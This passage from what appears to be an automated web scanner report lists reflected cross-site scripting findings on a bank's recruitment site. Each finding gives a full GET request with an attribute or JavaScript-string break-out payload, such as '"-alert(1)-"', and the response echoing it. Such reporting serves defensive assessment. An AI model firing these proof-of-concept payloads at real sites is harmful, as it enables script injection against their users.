User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:47 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:47 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Finance
...[SNIP]...
itment Group";
var SharingBaseTitle = "Finance - Join us - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_requirement_finance.php?3db45"-alert(1)-"70d4da21c3e=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.57. http://www.mycreditagricole.jobs/exp_requirement_finance.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement_finance.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9914"><a>15f3d546172 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_requirement_finance.php?f9914"><a>15f3d546172=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:21 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:21 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Finance
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_requirement_finance.php?f9914"><a>15f3d546172=1" />
...[SNIP]...

1.58. http://www.mycreditagricole.jobs/exp_requirement_inspection.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement_inspection.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 385da"><a>7fd10c6424f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_requirement_inspection.php?385da"><a>7fd10c6424f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:21 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:21 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>General
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_requirement_inspection.php?385da"><a>7fd10c6424f=1" />
...[SNIP]...

1.59. http://www.mycreditagricole.jobs/exp_requirement_inspection.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement_inspection.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63451"-alert(1)-"76e9d0fafce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_requirement_inspection.php?63451"-alert(1)-"76e9d0fafce=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:48 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:48 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>General
...[SNIP]...
SharingBaseTitle = "General Inspection Group - Join us - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_requirement_inspection.php?63451"-alert(1)-"76e9d0fafce=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.60. http://www.mycreditagricole.jobs/exp_requirement_risk.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement_risk.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c0b5"-alert(1)-"8193ba56906 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_requirement_risk.php?9c0b5"-alert(1)-"8193ba56906=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:50 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:50 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Risk ma
...[SNIP]...
t Group";
var SharingBaseTitle = "Risk management - Join us - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_requirement_risk.php?9c0b5"-alert(1)-"8193ba56906=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.61. http://www.mycreditagricole.jobs/exp_requirement_risk.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement_risk.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 677ed"><a>8f879e6e437 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_requirement_risk.php?677ed"><a>8f879e6e437=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:23 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:23 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Risk ma
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_requirement_risk.php?677ed"><a>8f879e6e437=1" />
...[SNIP]...

1.62. http://www.mycreditagricole.jobs/exp_video_room.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2309"><a>ae8497ea27f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_video_room.php?e2309"><a>ae8497ea27f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:27 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:27 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_video_room.php?e2309"><a>ae8497ea27f=1" />
...[SNIP]...

1.63. http://www.mycreditagricole.jobs/exp_video_room.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c890e"-alert(1)-"f5e4008b30e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_video_room.php?c890e"-alert(1)-"f5e4008b30e=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:58 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:58 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
t Agricole Recruitment Group";
var SharingBaseTitle = "Video room - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_video_room.php?c890e"-alert(1)-"f5e4008b30e=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.64. http://www.mycreditagricole.jobs/experimentes.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /experimentes.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ce8b"><a>1145145393c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /experimentes.php?6ce8b"><a>1145145393c=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:11 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:11 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Espace
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/experimentes.php?6ce8b"><a>1145145393c=1" />
...[SNIP]...

1.65. http://www.mycreditagricole.jobs/experimentes.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /experimentes.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc415"-alert(1)-"c905a7da152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /experimentes.php?dc415"-alert(1)-"c905a7da152=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:36 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:36 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Espace
...[SNIP]...
upe Cr..dit Agricole Recrutement";
var SharingBaseTitle = "Espace Exp..riment..s - Groupe Cr..dit Agricole Recrutement";
var SharingUrl = "http://www.recrutement.credit-agricole.com/experimentes.php?dc415"-alert(1)-"c905a7da152=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.66. http://www.mycreditagricole.jobs/faq.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /faq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b3f"><a>b80953a4cb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /faq.php?25b3f"><a>b80953a4cb4=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:41 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:41 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 66243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>FAQ - C
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/faq.php?25b3f"><a>b80953a4cb4=1" />
...[SNIP]...

1.67. http://www.mycreditagricole.jobs/faq.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /faq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94467"-alert(1)-"96e6996940f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /faq.php?94467"-alert(1)-"96e6996940f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:05:14 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:05:14 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 66264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>FAQ - C
...[SNIP]...
var SharingTitle = "FAQ - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "FAQ - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/faq.php?94467"-alert(1)-"96e6996940f=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.68. http://www.mycreditagricole.jobs/grad_campus_captains.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /grad_campus_captains.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4cc"-alert(1)-"a0f3d4c11a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /grad_campus_captains.php?6b4cc"-alert(1)-"a0f3d4c11a5=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:35 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:35 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>School
...[SNIP]...
ment Group";
var SharingBaseTitle = "School Captains - Campus - Graduates - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/grad_campus_captains.php?6b4cc"-alert(1)-"a0f3d4c11a5=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.69. http://www.mycreditagricole.jobs/grad_campus_captains.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /grad_campus_captains.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de376"><a>0e10001a2bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grad_campus_captains.php?de376"><a>0e10001a2bc=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:11 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:11 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>School
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/grad_campus_captains.php?de376"><a>0e10001a2bc=1" />
...[SNIP]...

1.70. http://www.mycreditagricole.jobs/grad_campus_forums.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /grad_campus_forums.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cec12"-alert(1)-"f67071f25e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /grad_campus_forums.php?cec12"-alert(1)-"f67071f25e0=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:43 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:43 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 98374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Forums
...[SNIP]...
ole Recruitment Group";
var SharingBaseTitle = "Forums - Campus - Graduates - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/grad_campus_forums.php?cec12"-alert(1)-"f67071f25e0=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.71. http://www.mycreditagricole.jobs/grad_campus_forums.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /grad_campus_forums.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73a48"><a>722a78de38f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grad_campus_forums.php?73a48"><a>722a78de38f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:07 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:07 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 98353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Forums
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/grad_campus_forums.php?73a48"><a>722a78de38f=1" />
...[SNIP]...

1.72. http://www.mycreditagricole.jobs/grad_campus_partnerships.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /grad_campus_partnerships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41565"-alert(1)-"505a6724661 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

